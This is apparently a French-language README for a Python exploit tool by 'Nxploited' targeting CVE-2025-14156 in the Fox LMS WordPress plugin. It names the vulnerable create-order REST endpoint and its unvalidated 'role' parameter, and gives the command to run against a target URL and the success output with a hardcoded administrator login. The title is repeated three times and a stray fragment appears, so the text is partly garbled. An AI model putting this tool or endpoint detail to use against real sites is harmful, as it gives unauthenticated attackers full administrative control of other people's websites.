
Fox LMS – Plugin LMS WordPress 1.0.4.7 - 1.0.5.1 - Élévation de privilèges non authentifiée via 'createOrder'
Fox LMS – WordPress LMS Plugin 1.0.4.7 - 1.0.5.1 - Escalade de privilèges non authentifiée via 'createOrder'
Fox LMS – Plugin LMS WordPress (v1.0.4.7 à v1.0.5.1) – Escalade de privilèges non authentifiée via createOrder
Toutes les versions jusqu'à la 1.0.5.1 inclus de Fox LMS pour WordPress sont vulnérables à l'escalade de privilèges. Le point de terminaison REST API /fox-lms/v1/payments/create-order ne valide pas correctement le paramètre 'role' lors de la création de nouveaux utilisateurs, permettant à des attaquants non authentifiés de créer des comptes avec des rôles arbitraires, y compris Administrateur.
CVE: CVE-2025-14156
Score CVSS: 9.8 (Critique)
Risque: Compromission totale du site.
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit par : Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help affiche ce message d'aide et quitte
-u, --url URL URL cible (ex. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
En cas d'exploitation réussie, le script affichera uniquement :
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
Si l'exploitation échoue, seul un message d'erreur concis sera affiché.
'administrator'.Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale. L'auteur n'est pas responsable des mauvaises utilisations, des dommages ou des conséquences juridiques résultant de l'utilisation de ce script. Suivez toujours les pratiques de divulgation responsable et assurez-vous d'avoir une autorisation écrite avant de tester une cible.
Telegram: @Nxploited
Github: Nxploited